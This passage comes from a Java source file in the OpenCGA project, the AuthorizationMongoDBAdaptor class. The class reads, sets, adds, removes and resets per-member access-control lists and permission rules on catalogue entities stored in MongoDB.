org.opencb.opencga.core.models.common.Enums; import org.opencb.opencga.core.models.study.PermissionRule; import org.opencb.opencga.core.models.study.Study; import org.opencb.opencga.core.response.OpenCGAResult; import org.slf4j.LoggerFactory; import java.util.*; import java.util.regex.Pattern; import java.util.stream.Collectors; import static org.opencb.commons.datastore.core.QueryParam.Type.INTEGER_ARRAY; import static org.opencb.commons.datastore.core.QueryParam.Type.TEXT_ARRAY; /** * Created by pfurio on 20/04/17. */ public class AuthorizationMongoDBAdaptor extends MongoDBAdaptor implements AuthorizationDBAdaptor { private Map<Enums.Resource, MongoDBCollection> dbCollectionMap = new HashMap<>(); private static final String ANONYMOUS = "*"; static final String MEMBER_WITH_INTERNAL_ACL = "_withInternalAcls"; public AuthorizationMongoDBAdaptor(DBAdaptorFactory dbFactory, Configuration configuration) throws CatalogDBException { super(configuration, LoggerFactory.getLogger(AuthorizationMongoDBAdaptor.class)); this.dbAdaptorFactory = (MongoDBAdaptorFactory) dbFactory; initCollectionConnections(); } enum QueryParams implements QueryParam { ID("id", INTEGER_ARRAY, ""), ACL("_acl", TEXT_ARRAY, ""), USER_DEFINED_ACLS("_userAcls", TEXT_ARRAY, ""); private static Map<String, QueryParams> map = new HashMap<>(); static { for (QueryParams param : QueryParams.values()) { map.put(param.key(), param); } } private final String key; private Type type; private String description; QueryParams(String key, Type type, String description) { this.key = key; this.type = type; this.description = description; } @Override public String key() { return key; } @Override public Type type() { return type; } @Override public String description() { return description; } public static Map<String, QueryParams> getMap() { return map; } public static QueryParams getParam(String key) { return map.get(key); } } private void initCollectionConnections() { this.dbCollectionMap.put(Enums.Resource.STUDY, 
dbAdaptorFactory.getCatalogStudyDBAdaptor().getStudyCollection()); this.dbCollectionMap.put(Enums.Resource.COHORT, dbAdaptorFactory.getCatalogCohortDBAdaptor().getCohortCollection()); this.dbCollectionMap.put(Enums.Resource.FILE, dbAdaptorFactory.getCatalogFileDBAdaptor().getCollection()); this.dbCollectionMap.put(Enums.Resource.INDIVIDUAL, dbAdaptorFactory.getCatalogIndividualDBAdaptor().getCollection()); this.dbCollectionMap.put(Enums.Resource.JOB, dbAdaptorFactory.getCatalogJobDBAdaptor().getJobCollection()); this.dbCollectionMap.put(Enums.Resource.SAMPLE, dbAdaptorFactory.getCatalogSampleDBAdaptor().getCollection()); this.dbCollectionMap.put(Enums.Resource.DISEASE_PANEL, dbAdaptorFactory.getCatalogPanelDBAdaptor().getPanelCollection()); this.dbCollectionMap.put(Enums.Resource.FAMILY, dbAdaptorFactory.getCatalogFamilyDBAdaptor().getCollection()); this.dbCollectionMap.put(Enums.Resource.CLINICAL_ANALYSIS, dbAdaptorFactory.getClinicalAnalysisDBAdaptor().getClinicalCollection()); } private List<String> getFullPermissions(Enums.Resource resource) { List<String> permissionList = new ArrayList<>(resource.getFullPermissionList()); permissionList.add("NONE"); return permissionList; } private void validateEntry(Enums.Resource entry) throws CatalogDBException { switch (entry) { case STUDY: case COHORT: case INDIVIDUAL: case JOB: case FILE: case SAMPLE: case DISEASE_PANEL: case FAMILY: case CLINICAL_ANALYSIS: return; default: throw new CatalogDBException("Unexpected parameter received. " + entry + " has been received."); } } /** * Internal method to fetch the permissions of every user. Permissions are splitted and returned in a map of user -> list of * permissions. * * @param resourceId Resource id being queried. * @param membersList Members for which we want to fetch the permissions. If empty, it should return the permissions for all members. * @param entry Entity where the query will be performed. 
     * @return A map of [acl, user_defined_acl] -> user -> List of permissions and the string id of the resource queried.
     */
    private EntryPermission internalGet(long resourceId, List<String> membersList, Enums.Resource entry) {
        EntryPermission entryPermission = new EntryPermission();

        List<String> members = (membersList == null ? Collections.emptyList() : membersList);

        MongoDBCollection collection = dbCollectionMap.get(entry);

        // Fetch only the id and the two ACL arrays of the requested document.
        List<Bson> aggregation = new ArrayList<>();
        aggregation.add(Aggregates.match(Filters.eq(PRIVATE_UID, resourceId)));
        aggregation.add(Aggregates.project(
                Projections.include(QueryParams.ID.key(), QueryParams.ACL.key(), QueryParams.USER_DEFINED_ACLS.key())));

        List<Bson> filters = new ArrayList<>();
        if (CollectionUtils.isNotEmpty(members)) {
            // ACL entries are "member<INTERNAL_DELIMITER>PERMISSION" strings, so a prefix regex on
            // the member name selects that member's entries. '*' (anonymous) must be regex-escaped.
            List<Pattern> regexMemberList = new ArrayList<>(members.size());
            for (String member : members) {
                if (!member.equals(ANONYMOUS)) {
                    regexMemberList.add(Pattern.compile("^" + member));
                } else {
                    regexMemberList.add(Pattern.compile("^\\*"));
                }
            }
            filters.add(Filters.in(QueryParams.ACL.key(), regexMemberList));
        }

        if (CollectionUtils.isNotEmpty(filters)) {
            Bson filter = filters.size() == 1 ?
                    filters.get(0) : Filters.and(filters);
            aggregation.add(Aggregates.match(filter));
        }

        for (Bson bson : aggregation) {
            logger.debug("Get Acl: {}", bson.toBsonDocument(Document.class, MongoClient.getDefaultCodecRegistry()));
        }

        DataResult<Document> aggregate = collection.aggregate(aggregation, null);

        Map<String, Map<String, List<String>>> permissions = entryPermission.getPermissions();
        if (aggregate.getNumResults() > 0) {
            // An empty member set means "return the permissions of every member".
            Set<String> memberSet = new HashSet<>();
            memberSet.addAll(members);

            Document document = aggregate.first();
            entryPermission.setId(document.getString(QueryParams.ID.key()));

            List<String> aclList = (List<String>) document.get(QueryParams.ACL.key());
            if (aclList != null) {
                // If _acl was not previously defined, it can be null the first time
                for (String memberPermission : aclList) {
                    // Each entry is "member<INTERNAL_DELIMITER>PERMISSION"; split once into [member, permission].
                    String[] split = StringUtils.splitByWholeSeparatorPreserveAllTokens(memberPermission, INTERNAL_DELIMITER, 2);
//                    String[] split = memberPermission.split(INTERNAL_DELIMITER, 2);
                    if (memberSet.isEmpty() || memberSet.contains(split[0])) {
                        if (!permissions.get(QueryParams.ACL.key()).containsKey(split[0])) {
                            permissions.get(QueryParams.ACL.key()).put(split[0], new ArrayList<>());
                        }
                        // The synthetic NONE marker is never reported back to callers.
                        if (!("NONE").equals(split[1])) {
                            permissions.get(QueryParams.ACL.key()).get(split[0]).add(split[1]);
                        }
                    }
                }
            }

            List<String> userDefinedAcls = (List<String>) document.get(QueryParams.USER_DEFINED_ACLS.key());
            if (userDefinedAcls != null) {
                // If _userAcls was not previously defined, it can be null the first time
                for (String memberPermission : userDefinedAcls) {
                    String[] split = StringUtils.splitByWholeSeparatorPreserveAllTokens(memberPermission, INTERNAL_DELIMITER, 2);
//                    String[] split = memberPermission.split(INTERNAL_DELIMITER, 2);
                    if (memberSet.isEmpty() || memberSet.contains(split[0])) {
                        if (!permissions.get(QueryParams.USER_DEFINED_ACLS.key()).containsKey(split[0])) {
                            permissions.get(QueryParams.USER_DEFINED_ACLS.key()).put(split[0], new ArrayList<>());
                        }
                        if (!("NONE").equals(split[1])) {
                            permissions.get(QueryParams.USER_DEFINED_ACLS.key()).get(split[0]).add(split[1]);
                        }
                    }
                }
            }
        }

        return entryPermission;
    }

    // Result holder for internalGet: the resource string id plus its parsed ACL maps.
    class EntryPermission {
        /**
         * Entry id.
         */
        private String id;
        /**
         * A map of [acl, user_defined_acl] -> user -> List of permissions.
         */
        private Map<String, Map<String, List<String>>> permissions;

        EntryPermission() {
            this.permissions = new HashMap<>();
            this.permissions.put(QueryParams.ACL.key(), new HashMap<>());
            this.permissions.put(QueryParams.USER_DEFINED_ACLS.key(), new HashMap<>());
        }

        private String getId() {
            return id;
        }

        private EntryPermission setId(String id) {
            this.id = id;
            return this;
        }

        private Map<String, Map<String, List<String>>> getPermissions() {
            return permissions;
        }

        private EntryPermission setPermissions(Map<String, Map<String, List<String>>> permissions) {
            this.permissions = permissions;
            return this;
        }
    }

    // Returns the effective permissions (_acl) of the given members over one resource.
    @Override
    public OpenCGAResult<Map<String, List<String>>> get(long resourceId, List<String> members, Enums.Resource entry)
            throws CatalogException {
        validateEntry(entry);
        long startTime = startQuery();

        EntryPermission entryPermission = internalGet(resourceId, members, entry);
        Map<String, List<String>> myMap = entryPermission.getPermissions().get(QueryParams.ACL.key());
        return endQuery(startTime, myMap.isEmpty() ?
                Collections.emptyList() : Collections.singletonList(myMap));
    }

    // Batched variant of get(long, ...): one result entry per resource id; an empty map is
    // appended when a resource had no matching ACLs so positions still line up with resourceIds.
    @Override
    public OpenCGAResult<Map<String, List<String>>> get(List<Long> resourceIds, List<String> members, Enums.Resource entry)
            throws CatalogException {
        OpenCGAResult<Map<String, List<String>>> result = OpenCGAResult.empty();
        for (Long resourceId : resourceIds) {
            OpenCGAResult<Map<String, List<String>>> tmpResult = get(resourceId, members, entry);
            result.append(tmpResult);
            if (tmpResult.getNumResults() == 0) {
                result.getResults().add(Collections.emptyMap());
            }
        }
        return result;
    }

    // Removes every ACL entry (effective and user-defined) of one member from all documents of
    // the given resource type belonging to the study.
    @Override
    public OpenCGAResult removeFromStudy(long studyId, String member, Enums.Resource resource) throws CatalogException {
        validateEntry(resource);
        Document query = new Document()
                .append(PRIVATE_STUDY_UID, studyId);
        List<String> removePermissions = createPermissionArray(Arrays.asList(member), getFullPermissions(resource));
        Document update = new Document("$pullAll", new Document()
                .append(QueryParams.ACL.key(), removePermissions)
                .append(QueryParams.USER_DEFINED_ACLS.key(), removePermissions)
        );
        logger.debug("Remove all acls for entity {} for member {} in study {}. Query: {}, pullAll: {}", resource, member, studyId,
                query.toBsonDocument(Document.class, MongoClient.getDefaultCodecRegistry()),
                update.toBsonDocument(Document.class, MongoClient.getDefaultCodecRegistry()));
        return new OpenCGAResult(dbCollectionMap.get(resource).update(query, update, new QueryOptions(MongoDBCollection.MULTI, true)));
    }

    @Override
    public OpenCGAResult setToMembers(long studyId, List<String> members, List<AuthorizationManager.CatalogAclParams> aclParams)
            throws CatalogDBException, CatalogParameterException, CatalogAuthorizationException {
        return runTransaction(clientSession -> {
            long startTime = startQuery();
            // We obtain which of those members are actually users to add them to the @members group automatically
            addToMembersGroupInStudy(studyId, members, clientSession);

            for (AuthorizationManager.CatalogAclParams aclParam : aclParams) {
                setToMembers(aclParam.getIds(), members, aclParam.getPermissions(), aclParam.getResource(), clientSession);
                // We store that those members have internal permissions
                setMembersHaveInternalPermissionsDefined(studyId, members, aclParam.getPermissions(), aclParam.getResource().name(),
                        clientSession);
            }
            return endWrite(startTime, aclParams.get(0).getIds().size(), aclParams.get(0).getIds().size(), null);
        });
    }

    // Study-level variant: replaces the members' permissions on the study documents themselves.
    @Override
    public OpenCGAResult setToMembers(List<Long> studyIds, List<String> members, List<String> permissions)
            throws CatalogDBException, CatalogParameterException, CatalogAuthorizationException {
        return runTransaction(clientSession -> {
            long startTime = startQuery();
            for (Long studyId : studyIds) {
                addToMembersGroupInStudy(studyId, members, clientSession);
            }
            setToMembers(studyIds, members, permissions, Enums.Resource.STUDY, clientSession);
            return endWrite(startTime, 1, 1, null);
        });
    }

    // Overwrites the members' permissions on the given resources: first pulls every possible
    // permission for those members, then pushes only the requested ones.
    private void setToMembers(List<Long> resourceIds, List<String> members, List<String> permissionList, Enums.Resource resource,
                              ClientSession clientSession) throws CatalogDBException {
        validateEntry(resource);
        MongoDBCollection collection =
                dbCollectionMap.get(resource);

        /* 1. We are going to try to remove all the permissions to those members in first instance */

        // We add the NONE permission by default so when a user is removed some permissions (not reset), the NONE permission remains
        // NOTE(review): getFullPermissions() already appends "NONE", so it appears twice in this
        // list. Harmless for $pullAll, but redundant.
        List<String> permissions = getFullPermissions(resource);
        permissions.add("NONE");
        permissions = createPermissionArray(members, permissions);

        Document queryDocument = new Document()
                .append(PRIVATE_UID, new Document("$in", resourceIds));
        Document update = new Document(QueryParams.ACL.key(), permissions);
        if (isPermissionRuleEntity(resource)) {
            update.put(QueryParams.USER_DEFINED_ACLS.key(), permissions);
        }
        update = new Document("$pullAll", update);
        logger.debug("Pull all acls: Query {}, PullAll {}, entity: {}",
                queryDocument.toBsonDocument(Document.class, MongoClient.getDefaultCodecRegistry()),
                update.toBsonDocument(Document.class, MongoClient.getDefaultCodecRegistry()), resource);
        collection.update(clientSession, queryDocument, update, new QueryOptions("multi", true));

        /* 2. We now add the expected permissions to those members */

        // We add the NONE permission by default so when a user is removed some permissions (not reset), the NONE permission remains
        permissions = new ArrayList<>(permissionList);
        permissions.add("NONE");
        permissions = createPermissionArray(members, permissions);
        update = new Document(QueryParams.ACL.key(), new Document("$each", permissions));
        if (isPermissionRuleEntity(resource)) {
            update.put(QueryParams.USER_DEFINED_ACLS.key(), new Document("$each", permissions));
        }
        update = new Document("$addToSet", update);
        logger.debug("Add Acls (addToSet): Query {}, Push {}, entity: {}",
                queryDocument.toBsonDocument(Document.class, MongoClient.getDefaultCodecRegistry()),
                update.toBsonDocument(Document.class, MongoClient.getDefaultCodecRegistry()), resource);
        collection.update(clientSession, queryDocument, update, new QueryOptions("multi", true));
    }

    @Override
    public OpenCGAResult addToMembers(long studyId, List<String> members, List<AuthorizationManager.CatalogAclParams> aclParams)
            throws CatalogDBException, CatalogParameterException, CatalogAuthorizationException {
        return runTransaction(clientSession -> {
            long startTime = startQuery();
            addToMembersGroupInStudy(studyId, members, clientSession);

            for (AuthorizationManager.CatalogAclParams aclParam : aclParams) {
                addToMembers(aclParam.getIds(), members, aclParam.getPermissions(), aclParam.getResource(), clientSession);
                // We store that those members have internal permissions
                setMembersHaveInternalPermissionsDefined(studyId, members, aclParam.getPermissions(), aclParam.getResource().name(),
                        clientSession);
            }
            return endWrite(startTime, aclParams.get(0).getIds().size(), aclParams.get(0).getIds().size(), null);
        });
    }

    // Adds the given permissions to the members on the resources without removing existing ones.
    private void addToMembers(List<Long> resourceIds, List<String> members, List<String> permissionList, Enums.Resource resource,
                              ClientSession clientSession) throws CatalogDBException {
        validateEntry(resource);
        MongoDBCollection collection = dbCollectionMap.get(resource);

        // We add the NONE permission by default so when a user is removed some permissions (not reset), the NONE permission remains
        List<String> permissions = new ArrayList<>(permissionList);
        permissions.add("NONE");

        List<String> myPermissions = createPermissionArray(members, permissions);

        Document queryDocument = new Document()
                .append(PRIVATE_UID, new Document("$in", resourceIds));
        Document update;
        if (isPermissionRuleEntity(resource)) {
            // Manual additions are mirrored in the user-defined ACL array.
            update = new Document("$addToSet", new Document()
                    .append(QueryParams.ACL.key(), new Document("$each", myPermissions))
                    .append(QueryParams.USER_DEFINED_ACLS.key(), new Document("$each", myPermissions))
            );
        } else {
            update = new Document("$addToSet", new Document(QueryParams.ACL.key(), new Document("$each", myPermissions)));
        }
        logger.debug("Add Acls (addToSet): Query {}, Push {}",
                queryDocument.toBsonDocument(Document.class, MongoClient.getDefaultCodecRegistry()),
                update.toBsonDocument(Document.class, MongoClient.getDefaultCodecRegistry()));

        collection.update(clientSession, queryDocument, update, new QueryOptions("multi", true));
    }

    @Override
    public OpenCGAResult addToMembers(List<Long> studyIds, List<String> members, List<String> permissions)
            throws CatalogDBException, CatalogParameterException, CatalogAuthorizationException {
        return runTransaction((clientSession) -> {
            long startTime = startQuery();
            for (Long studyId : studyIds) {
                addToMembersGroupInStudy(studyId, members, clientSession);
            }
            addToMembers(studyIds, members, permissions, Enums.Resource.STUDY, clientSession);
            return endWrite(startTime, 1, 1, null);
        });
    }

    // Ensures every plain user (anything not starting with '@', i.e. not a group) in 'members'
    // belongs to the study @members group.
    private void addToMembersGroupInStudy(long studyId, List<String> members, ClientSession clientSession) throws CatalogDBException {
        // We obtain which of those members are actually users to add them to the @members group automatically
        List<String> userList = members.stream()
                .filter(member -> !member.startsWith("@"))
                .collect(Collectors.toList());
        if (CollectionUtils.isNotEmpty(userList)) {
            // We first add the member to the @members group in case they didn't belong already
            dbAdaptorFactory.getCatalogStudyDBAdaptor().addUsersToGroup(studyId, CatalogAuthorizationManager.MEMBERS_GROUP, userList,
                    clientSession);
        }
    }

    @Override
    public OpenCGAResult removeFromMembers(List<String> members, List<AuthorizationManager.CatalogAclParams> aclParams)
            throws CatalogDBException, CatalogParameterException, CatalogAuthorizationException {
        return runTransaction(clientSession -> {
            long startTime = startQuery();
            for (AuthorizationManager.CatalogAclParams aclParam : aclParams) {
                removeFromMembers(clientSession, aclParam.getIds(), members, aclParam.getPermissions(), aclParam.getResource());
            }
            return endWrite(startTime, aclParams.get(0).getIds().size(), aclParams.get(0).getIds().size(), null);
        });
    }

    // Pulls the given permissions (or every possible permission when the list is null/empty)
    // of the members from the resources.
    private void removeFromMembers(ClientSession clientSession, List<Long> resourceIds, List<String> members,
                                   List<String> permissionList, Enums.Resource resource) throws CatalogDBException {
        validateEntry(resource);
        MongoDBCollection collection = dbCollectionMap.get(resource);

        List<String> permissions = permissionList;

        if (permissions == null || permissions.isEmpty()) {
            // We get all possible permissions those members will have to do a full reset
            permissions = getFullPermissions(resource);
        }

        List<String> removePermissions = createPermissionArray(members, permissions);
        Document queryDocument = new Document()
                .append(PRIVATE_UID, new Document("$in", resourceIds));
        Document update;
        if (isPermissionRuleEntity(resource)) {
            update = new Document("$pullAll", new Document()
                    .append(QueryParams.ACL.key(), removePermissions)
                    .append(QueryParams.USER_DEFINED_ACLS.key(), removePermissions)
            );
        } else {
            update = new Document("$pullAll", new Document(QueryParams.ACL.key(), removePermissions));
        }
        logger.debug("Remove Acls (pullAll): Query {}, Pull {}",
                queryDocument.toBsonDocument(Document.class, MongoClient.getDefaultCodecRegistry()),
                update.toBsonDocument(Document.class, MongoClient.getDefaultCodecRegistry()));
        collection.update(clientSession, queryDocument, update, new QueryOptions("multi", true));
    }

    // Wipes every ACL entry of the given members from all ACL-enabled entities of the study
    // (including the study document itself), inside a single transaction.
    @Override
    public OpenCGAResult resetMembersFromAllEntries(long studyId, List<String> members)
            throws CatalogDBException, CatalogParameterException, CatalogAuthorizationException {
        if (members == null || members.isEmpty()) {
            throw new CatalogDBException("Missing 'members' array.");
        }

        return runTransaction(clientSession -> {
            long tmpStartTime = startQuery();
            logger.debug("Resetting permissions of users '{}' for study '{}'", members, studyId);
            dbAdaptorFactory.getCatalogStudyDBAdaptor().checkId(clientSession, studyId);

            removePermissions(clientSession, studyId, members, Enums.Resource.COHORT);
            removePermissions(clientSession, studyId, members, Enums.Resource.FILE);
            removePermissions(clientSession, studyId, members, Enums.Resource.INDIVIDUAL);
            removePermissions(clientSession, studyId, members, Enums.Resource.JOB);
            removePermissions(clientSession, studyId, members, Enums.Resource.SAMPLE);
            removePermissions(clientSession, studyId, members, Enums.Resource.DISEASE_PANEL);
            removePermissions(clientSession, studyId, members, Enums.Resource.FAMILY);
            removePermissions(clientSession, studyId, members, Enums.Resource.CLINICAL_ANALYSIS);
            removeFromMembers(clientSession, Arrays.asList(studyId), members, null, Enums.Resource.STUDY);

            return endWrite(tmpStartTime, -1, -1, null);
        });
    }

    // Replaces ($set) the full ACL arrays of each resource: current permissions are read first
    // and the entries for the given members are overridden.
    // TODO: Make this method transactional
    @Override
    public OpenCGAResult<Map<String, List<String>>> setAcls(List<Long> resourceIds, Map<String, List<String>> acls,
                                                            Enums.Resource resource) throws CatalogDBException {
        validateEntry(resource);
        MongoDBCollection collection = dbCollectionMap.get(resource);

        for (long resourceId : resourceIds) {
            // Get current permissions for resource and override with new ones set for members (already existing or not)
            Map<String, Map<String, List<String>>> currentPermissions = internalGet(resourceId, Collections.emptyList(), resource)
                    .getPermissions();
            for (Map.Entry<String, List<String>> entry : acls.entrySet()) {
                // We add the NONE permission by default so when a user is removed some permissions (not reset), the NONE permission
                // remains
                List<String> permissions = new ArrayList<>(entry.getValue());
                permissions.add("NONE");
                currentPermissions.get(QueryParams.ACL.key()).put(entry.getKey(), permissions);
                currentPermissions.get(QueryParams.USER_DEFINED_ACLS.key()).put(entry.getKey(), permissions);
            }
            List<String> permissionArray = createPermissionArray(currentPermissions.get(QueryParams.ACL.key()));
            List<String> manualPermissionArray = createPermissionArray(currentPermissions.get(QueryParams.USER_DEFINED_ACLS.key()));

            Document queryDocument = new Document()
                    .append(PRIVATE_UID, resourceId);
            Document update;
            if (isPermissionRuleEntity(resource)) {
                update = new Document("$set", new Document()
                        .append(QueryParams.ACL.key(), permissionArray)
                        .append(QueryParams.USER_DEFINED_ACLS.key(), manualPermissionArray));
            } else {
                update = new Document("$set", new Document(QueryParams.ACL.key(), permissionArray));
            }
            logger.debug("Set Acls (set): Query {}, Push {}",
                    queryDocument.toBsonDocument(Document.class, MongoClient.getDefaultCodecRegistry()),
                    update.toBsonDocument(Document.class, MongoClient.getDefaultCodecRegistry()));

            collection.update(queryDocument, update, new QueryOptions(MongoDBCollection.MULTI, true));
        }

        return OpenCGAResult.empty();
    }

    // Records in the study document that these members have entity-level ACLs defined
    // (appends the entity name under _withInternalAcls.<member>).
    private void setMembersHaveInternalPermissionsDefined(long studyId, List<String> members, List<String> permissions, String entity,
                                                          ClientSession clientSession) {
        // We only store if a member has internal permissions defined if it hasn't been given VIEW permission
//        if (permissions.contains("VIEW")) {
//            return;
//        }
        Document queryDocument = new Document()
                .append(PRIVATE_UID, studyId);

        Document addToSet = new Document();
        for (String member : members) {
            addToSet.append(MEMBER_WITH_INTERNAL_ACL + "." + member, entity);
        }
        Document update = new Document("$addToSet", addToSet);

        MongoDBCollection collection = dbCollectionMap.get(Enums.Resource.STUDY);
        collection.update(clientSession, queryDocument, update, new QueryOptions());
    }

    // Pushes the permissions of a rule to every entry matching the rule's query that has not
    // been tagged with the rule id yet; only the effective ACL array is touched (not _userAcls).
    @Override
    public OpenCGAResult applyPermissionRules(long studyId, PermissionRule permissionRule, Enums.Entity entry) throws CatalogException {
        MongoDBCollection collection = dbCollectionMap.get(entry.getResource());

        // We will apply the permission rules to all the entries matching the query defined in the permission rules that does not have
        // the permission rules applied yet
        Document rawQuery = new Document()
                .append(PRIVATE_STUDY_UID, studyId)
                .append(PERMISSION_RULES_APPLIED, new Document("$ne", permissionRule.getId()));
        Bson bson = parseQuery(permissionRule.getQuery(), rawQuery, entry.getResource());

        // We add the NONE permission by default so when a user is removed some permissions (not reset), the NONE permission remains
        List<String> permissions = new ArrayList<>(permissionRule.getPermissions());
        permissions.add("NONE");
        List<String> myPermissions = createPermissionArray(permissionRule.getMembers(), permissions);

        Document update = new Document()
                .append("$addToSet", new Document()
                        .append(QueryParams.ACL.key(), new Document("$each", myPermissions))
                        .append(PERMISSION_RULES_APPLIED, permissionRule.getId()));

        logger.debug("Apply permission rules: Query {}, Update {}",
                bson.toBsonDocument(Document.class, MongoClient.getDefaultCodecRegistry()),
                update.toBsonDocument(Document.class, MongoClient.getDefaultCodecRegistry()));

        return new OpenCGAResult(collection.update(bson, update, new QueryOptions("multi", true)));
    }

    // Deletes a rule and rebuilds each tagged entry's ACLs from scratch: rule permissions are
    // removed from both ACL arrays, then the remaining applied rules are re-added.
    //TODO: Make transactional !
    @Override
    public OpenCGAResult removePermissionRuleAndRemovePermissions(Study study, String permissionRuleToDeleteId, Enums.Entity entry)
            throws CatalogException {
        // Prepare the permission rule list into a map of permissionRuleId - PermissionRule to make much easier the process
        Map<String, PermissionRule> permissionRuleMap = study.getPermissionRules().get(entry).stream()
                .collect(Collectors.toMap(PermissionRule::getId, p -> p));

        PermissionRule permissionRuleToDelete = permissionRuleMap.get(permissionRuleToDeleteId);

        Set<String> permissionsToRemove =
                createPermissionArray(permissionRuleToDelete.getMembers(), permissionRuleToDelete.getPermissions())
                        .stream().collect(Collectors.toSet());

        MongoDBCollection collection = dbCollectionMap.get(entry.getResource());

        // Remove the __TODELETE tag...
        String permissionRuleId = permissionRuleToDeleteId.split(INTERNAL_DELIMITER)[0];

        // 1. Get all the entries that have the permission rule to be removed applied
        Document query = new Document()
                .append(PRIVATE_STUDY_UID, study.getUid())
                .append(PERMISSION_RULES_APPLIED, permissionRuleId);
        QueryOptions options = new QueryOptions(QueryOptions.INCLUDE, Arrays.asList(QueryParams.ACL.key(),
                QueryParams.USER_DEFINED_ACLS.key(), PERMISSION_RULES_APPLIED, PRIVATE_UID));
        MongoDBIterator<Document> iterator = collection.iterator(query, options);
        while (iterator.hasNext()) {
            Document myDocument = iterator.next();
            Set<String> effectivePermissions = new HashSet<>();
            Set<String> manualPermissions = new HashSet<>();
            Set<String> permissionRulesApplied = new HashSet<>();

            List<String> currentAclList = (List) myDocument.get(QueryParams.ACL.key());
            List<String> currentManualAclList = (List) myDocument.get(QueryParams.USER_DEFINED_ACLS.key());
            List<String> currentPermissionRulesApplied = (List) myDocument.get(PERMISSION_RULES_APPLIED);

            // TODO: Control that if there are no more permissions set for a user or group, we should also remove the NONE permission

            // Remove permissions from the permission rule
            for (String permission : currentAclList) {
                if (!permissionsToRemove.contains(permission)) {
                    effectivePermissions.add(permission);
                }
            }

            // Remove permissions from the permission rule from the internal manual permissions list
            if (currentManualAclList != null) {
                for (String permission : currentManualAclList) {
                    if (!permissionsToRemove.contains(permission)) {
                        manualPermissions.add(permission);
                    }
                }
            }

            for (String tmpPermissionRuleId : currentPermissionRulesApplied) {
                // We apply the rest of permission rules except the one to be deleted
                if (!tmpPermissionRuleId.equals(permissionRuleId)) {
                    PermissionRule tmpPermissionRule = permissionRuleMap.get(tmpPermissionRuleId);
                    List<String> tmpPermissionList = new ArrayList<>(tmpPermissionRule.getPermissions());
                    tmpPermissionList.add("NONE");
                    List<String> permissionArray = createPermissionArray(tmpPermissionRule.getMembers(), tmpPermissionList);
                    effectivePermissions.addAll(permissionArray);
                    permissionRulesApplied.add(tmpPermissionRuleId);
                }
            }

            Document tmpQuery = new Document()
                    .append(PRIVATE_UID, myDocument.get(PRIVATE_UID))
                    .append(PRIVATE_STUDY_UID, study.getUid());

            Document update = new Document("$set", new Document()
                    .append(QueryParams.ACL.key(), effectivePermissions)
                    .append(QueryParams.USER_DEFINED_ACLS.key(), manualPermissions)
                    .append(PERMISSION_RULES_APPLIED, permissionRulesApplied));

            logger.debug("Remove permission rule id and permissions from {}: Query {}, Update {}", entry,
                    tmpQuery.toBsonDocument(Document.class, MongoClient.getDefaultCodecRegistry()),
                    update.toBsonDocument(Document.class, MongoClient.getDefaultCodecRegistry()));

            DataResult result = collection.update(tmpQuery, update, new QueryOptions("multi", true));
            if (result.getNumUpdated() == 0) {
                throw new CatalogException("Could not update and remove permission rule from entry " + myDocument.get(PRIVATE_UID));
            }
        }

        // 2. Remove the permission rule from the map in the study
        removeReferenceToPermissionRuleInStudy(study.getUid(), permissionRuleToDeleteId, entry);

        return OpenCGAResult.empty();
    }

    // Deletes a rule but keeps (restores) the manually assigned permissions: rule permissions
    // are removed from the effective ACLs, then _userAcls and the other applied rules are re-added.
    @Override
    public OpenCGAResult removePermissionRuleAndRestorePermissions(Study study, String permissionRuleToDeleteId, Enums.Entity entry)
            throws CatalogException {
        // Prepare the permission rule list into a map of permissionRuleId - PermissionRule to make much easier the process
        Map<String, PermissionRule> permissionRuleMap = study.getPermissionRules().get(entry).stream()
                .collect(Collectors.toMap(PermissionRule::getId, p -> p));

        PermissionRule permissionRuleToDelete = permissionRuleMap.get(permissionRuleToDeleteId);

        Set<String> permissionsToRemove =
                createPermissionArray(permissionRuleToDelete.getMembers(), permissionRuleToDelete.getPermissions())
                        .stream().collect(Collectors.toSet());

        MongoDBCollection collection = dbCollectionMap.get(entry.getResource());

        // Remove the __TODELETE tag...
        String permissionRuleId = permissionRuleToDeleteId.split(INTERNAL_DELIMITER)[0];

        // 1. Get all the entries that have the permission rule to be removed applied
        Document query = new Document()
                .append(PRIVATE_STUDY_UID, study.getUid())
                .append(PERMISSION_RULES_APPLIED, permissionRuleId);
        QueryOptions options = new QueryOptions(QueryOptions.INCLUDE, Arrays.asList(QueryParams.ACL.key(),
                QueryParams.USER_DEFINED_ACLS.key(), PERMISSION_RULES_APPLIED, PRIVATE_UID));
        MongoDBIterator<Document> iterator = collection.iterator(query, options);
        while (iterator.hasNext()) {
            Document myDocument = iterator.next();
            Set<String> effectivePermissions = new HashSet<>();
            Set<String> permissionRulesApplied = new HashSet<>();

            List<String> currentAclList = (List) myDocument.get(QueryParams.ACL.key());
            List<String> currentManualAclList = (List) myDocument.get(QueryParams.USER_DEFINED_ACLS.key());
            List<String> currentPermissionRulesApplied = (List) myDocument.get(PERMISSION_RULES_APPLIED);

            // TODO: Control that if there are no more permissions set for a user or group, we should also remove the NONE permission

            // Remove permissions from the permission rule
            for (String permission : currentAclList) {
                if (!permissionsToRemove.contains(permission)) {
                    effectivePermissions.add(permission);
                }
            }

            // Restore manual permissions
            if (currentManualAclList != null) {
                for (String permission : currentManualAclList) {
                    effectivePermissions.add(permission);
                }
            }

            for (String tmpPermissionRuleId : currentPermissionRulesApplied) {
                // We apply the rest of permission rules except the one to be deleted
                if (!tmpPermissionRuleId.equals(permissionRuleId)) {
                    PermissionRule tmpPermissionRule = permissionRuleMap.get(tmpPermissionRuleId);
                    List<String> tmpPermissionList = new ArrayList<>(tmpPermissionRule.getPermissions());
                    tmpPermissionList.add("NONE");
                    List<String> permissionArray = createPermissionArray(tmpPermissionRule.getMembers(), tmpPermissionList);
                    effectivePermissions.addAll(permissionArray);
                    permissionRulesApplied.add(tmpPermissionRuleId);
                }
            }

            Document tmpQuery = new Document()
                    .append(PRIVATE_UID,
                            myDocument.get(PRIVATE_UID))
                    .append(PRIVATE_STUDY_UID, study.getUid());

            Document update = new Document("$set", new Document()
                    .append(QueryParams.ACL.key(), effectivePermissions)
                    .append(PERMISSION_RULES_APPLIED, permissionRulesApplied));

            logger.debug("Remove permission rule id and restoring permissions from {}: Query {}, Update {}", entry,
                    tmpQuery.toBsonDocument(Document.class, MongoClient.getDefaultCodecRegistry()),
                    update.toBsonDocument(Document.class, MongoClient.getDefaultCodecRegistry()));

            DataResult result = collection.update(tmpQuery, update, new QueryOptions("multi", true));
            if (result.getNumUpdated() == 0) {
                throw new CatalogException("Could not update and remove permission rule from entry " + myDocument.get(PRIVATE_UID));
            }
        }

        // 2. Remove the permission rule from the map in the study
